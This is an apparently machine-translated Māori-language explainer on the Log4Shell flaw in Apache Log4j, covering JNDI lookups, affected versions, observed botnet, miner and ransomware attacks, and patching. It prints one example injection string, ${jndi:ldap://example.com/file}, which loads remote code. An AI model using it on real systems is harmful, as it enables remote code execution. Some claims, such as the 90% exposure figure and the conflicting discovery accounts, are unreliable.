Ripanga o Ihirangi[Huna][Whakaatu]
I te mutunga o Whiringa-a-rangi 2021, i hurahia e matou tetahi riri nui ki te haumaru ipurangi. Ko tenei mahi ka pa ki nga miriona o nga punaha rorohiko puta noa i te ao.
He aratohu tenei mo te whakaraeraetanga a Log4j me te ahua o te koha o te hoahoa i warewarehia i mahue i te 90% o nga ratonga rorohiko o te ao e tuwhera ana ki te whakaeke.
Ko te Apache Log4j he puna-tuwhera i runga i te taputapu takiuru Java-i hangaia e te Apache Software Foundation. I tuhia tuatahitia e Ceki Gülcü i te tau 2001, he wahanga o Apache Logging Services inaianei, he kaupapa na te Apache Software Foundation.
Ka whakamahi nga kamupene huri noa i te ao i te whare pukapuka Log4j kia taea ai te takiuru ki o raatau tono. Ko te mea pono, ko te whare pukapuka Java kei nga waahi katoa, ka kitea e koe i roto i nga tono mai i Amazon, Microsoft, Google, me etahi atu.
Ko te hiranga o te whare pukapuka ko te tikanga ko nga hapa kei roto i te waehere ka waiho nga miriona rorohiko e tuwhera ana ki te hacking. I te Noema 24th 2021, a te kapua tau I kitea e te kairangahau e mahi ana mo Alibaba tetahi koha kino.
Ko te whakaraeraetanga o Log4j, e mohiotia ana ko Log4Shell, i noho kore i kitea mai i te tau 2013. Ko te whakaraeraetanga i taea ai e nga kaiwhakaari kino te whakahaere waehere ki runga i nga punaha kua pa ki a Log4j. I whakapuakina nuitia i te Hakihea 9, 2021
E kiia ana e nga tohunga ahumahi ko te Log4Shell koha te whakaraeraetanga nui rawa atu i roto i nga maharatanga tata nei.
I te wiki i muri mai i te whakaputanga o te whakaraeraetanga, kua kitea e nga roopu haumaru ipurangi nga miriona whakaeke. Ko etahi o nga kairangahau i kite i te tere neke atu i te kotahi rau nga whakaeke i ia meneti.
Ka pēhea te mahi?
Kia mohio ai tatou he aha te kino o te Log4Shell, me mohio tatou he aha tana kaha.
Ko te whakaraeraetanga o te Log4Shell ka taea te mahi tohu noa, ko te tikanga ka taea e te kaitukino te whakahaere i tetahi whakahau, waehere ranei i runga i te miihini whaainga.
Me pehea e tutuki ai tenei?
Tuatahi, me maarama he aha te JNDI.
Ko te Java Naming and Directory Interface (JNDI) he ratonga Java ka taea e nga kaupapa Java te kimi me te rapu raraunga me nga rauemi ma te ingoa. He mea nui enei ratonga whaiaronga na te mea ka whakaratohia he huinga rekoata kua whakaritea mo nga kaiwhakawhanake kia ngawari te tohutoro ina hanga tono.
Ka taea e te JNDI te whakamahi i nga momo kawa hei uru atu ki tetahi raarangi. Ko tetahi o enei tikanga ko te Lightweight Directory Access Protocol, LDAP ranei.
Ina takiuru he aho, Rangitaki4j ka mahi whakakapi aho ina ka tutaki ki nga whakaaturanga o te ahua ${prefix:name}
.
Hei tauira, Text: ${java:version}
ka tuhia hei Kuputuhi: Java putanga 1.8.0_65. He mea noa enei momo whakakapinga.
Ka taea hoki e tatou nga korero penei Text: ${jndi:ldap://example.com/file}
e whakamahi ana i te punaha JNDI ki te uta i tetahi mea Java mai i te URL ma te kawa LDAP.
Ma tenei ka utaina nga raraunga mai i taua URL ki te miihini. Ka taea e tetahi kaitukino te manaaki i nga waehere kino i runga i te URL whanui me te tatari mo nga miihini e whakamahi ana i te Log4j ki te takiuru.
I te mea kei roto i nga korero o nga karere rangitaki nga raraunga e whakahaerehia ana e te kaiwhakamahi, ka taea e nga kaiwhaiwhai te whakauru i a raatau ake tohutoro JNDI e tohu ana ki nga tūmau LDAP e whakahaeretia ana e ratou. Ko enei tūmau LDAP ka ki tonu i nga taonga Java kino ka taea e te JNDI te mahi ma te whakaraerae.
He aha te mea kino ake ko te kore he aha mena he taha-tumau te tono, he tono taha-kiritaki ranei.
I te mea he huarahi mo te kaitautapa ki te panui i te waehere kino a te kaitukino, kei te tuwhera tonu te tono ki te whakamahi.
Ko wai e pa ana?
Ko te whakaraeraetanga ka pa ki nga punaha me nga ratonga katoa e whakamahi ana i te APache Log4j, me nga putanga 2.0 tae atu ki te 2.14.1.
He maha nga tohunga mo te haumaru e kii ana ka pa te whakaraeraetanga ki te maha o nga tono ma te whakamahi Java.
I kitea tuatahi te hapa i roto i te keemu ataata Minecraft a Microsoft. Kua tohe a Microsoft ki o raatau kaiwhakamahi ki te whakahou i a raatau rorohiko Minecraft putanga Java kia kore ai e raru.
Jen Easterly, te Kaiwhakahaere o Cybersecurity and Infrastructure Security Agency (CISA) e kii ana ko nga kaihoko he kawenga nui ki te aukati i nga kaiwhakamahi mutunga mai i nga kaiwhakaari kino e whakamahi ana i tenei whakaraeraetanga.
"Me korero ano nga kaihoko ki o raatau kaihoko kia mohio ai nga kaiwhakamahi mutunga kei roto i a raatau hua tenei whakaraeraetanga me te whakarite i nga whakahoutanga rorohiko."
E ai ki te korero kua timata kee nga whakaeke. Ko Symantec, he kamupene e whakarato ana i nga rorohiko haumaru ipurangi, kua kite i te maha o nga tono whakaeke.
Anei etahi tauira o nga momo whakaeke kua kitea e nga kairangahau:
- botnets
Ko nga Botnets he whatunga rorohiko kei raro i te mana o te ope whakaeke kotahi. Ka awhina ratou ki te mahi whakaeke DDoS, tahae raraunga, me etahi atu tinihanga. I kitea e nga Kairangahau te botnet Muhstik i roto i nga tuhinga anga i tangohia mai i te whakamahi a Log4j.
- XMRig Miner Torotiana
Ko te XMRig he kaikeri moni crypto tuwhera e whakamahi ana i nga PTM ki te maina i te tohu Monero. Ka taea e nga kaikino ipurangi te whakauru i te XMRig ki nga taputapu a te tangata kia taea ai e ratou te whakamahi i o raatau mana tukatuka me te kore e mohio.
- Khonsari Ransomware
Ko te Ransomware e tohu ana ki te ahua o te malware i hangaia ki whakamuna kōnae i runga rorohiko. Ka taea e te hunga whakaeke te tono utu hei utu mo te whakahoki urunga ki nga konae kua whakamunatia. I kitea e nga kairangahau te Khonsari ransomware i roto i nga whakaeke Log4Shell. Ka aro ratou ki nga tūmau Windows me te whakamahi i te angamahi .NET.
He aha te mea e whai ake nei?
E matapaetia ana e nga tohunga he marama, he maha pea nga tau ki te whakatika i nga raruraru i puta mai i te whakaraeraetanga a Log4J.
Ko tenei tukanga ko te whakahou i nga punaha katoa e pa ana me te putanga papaki. Ahakoa kua papakihia enei punaha katoa, kei te tata tonu te riri o nga kuaha o muri kua taapirihia e nga kaiwhai ki te matapihi e tuwhera ana nga kaitoro mo te whakaeke.
E rave rahi nga otinga me nga whakamaarama kei te noho hei aukati i nga tono kei te whakamahia e tenei bug. Ko te putanga Log4j hou 2.15.0-rc1 i whakarereke i nga momo tautuhinga hei whakaiti i tenei whakaraeraetanga.
Ko nga ahuatanga katoa e whakamahi ana i te JNDI ka whakakorehia ma te taunoa, kua aukatia hoki nga rapunga mamao. Ko te whakakore i te ahua rapu i runga i to tatūnga Log4j ka awhina i te whakaiti i te tupono o nga mahi ka taea.
Kei waho atu i te Log4j, kei te hiahia tonu he mahere whanui hei aukati i nga mahi tuwhera-puna.
I mua o Mei, ka tukuna e te Whare White he te mana whakahaere i whai ki te whakapai ake i te haumaru ipurangi a motu. I whakauruhia he whakaritenga mo te pire rorohiko o nga rawa (SBOM) he tuhinga okawa kei roto he rarangi o nga mea katoa hei hanga i te tono.
Kei roto i tenei ko nga waahanga penei i te tuwhera puna pōkai, whakawhirinaki, me nga API e whakamahia ana mo te whanaketanga. Ahakoa he pai te whakaaro o nga SBOM mo te marama, ka tino awhina i te kaihoko?
Ko te whakapai ake i nga whakawhirinakitanga ka nui rawa te raruraru. Ka taea e nga kamupene te kowhiri ki te utu i nga whaina, kaua ki te morearea mo te wa roa ki te rapu putea rereke. Tena pea ka whai hua enei SBOM mena ka whai hua awhe he iti noa atu.
Opaniraa
Ko te take Log4j he nui ake i te raruraru hangarau mo nga whakahaere.
Me mohio nga kaihautu pakihi ki nga tupono ka puta mai i te wa e whakawhirinaki ana o raatau kaitoro, hua, ratonga ranei ki te waehere kaore e mau tonu ana.
Ko te ti'aturi i runga i te puna tuwhera me nga tono a te hunga tuatoru ka tae mai me te nui o te tupono. Me whai whakaaro nga kamupene ki te mahi i nga rautaki whakaheke morearea i mua i te puta mai o nga riri hou.
Ko te nuinga o te paetukutuku e whakawhirinaki ana ki nga punaha tuwhera-puna e tiakina ana e nga mano tini o nga kaitūao puta noa i te ao.
Mena kei te pirangi matou ki te pupuri i te paetukutuku hei waahi haumaru, me whakapau moni nga kawanatanga me nga kaporeihana ki te whakawhiwhi moni ki nga mahi tuwhera puna me nga tari haumaru ipurangi penei i te CISA.
Waiho i te Reply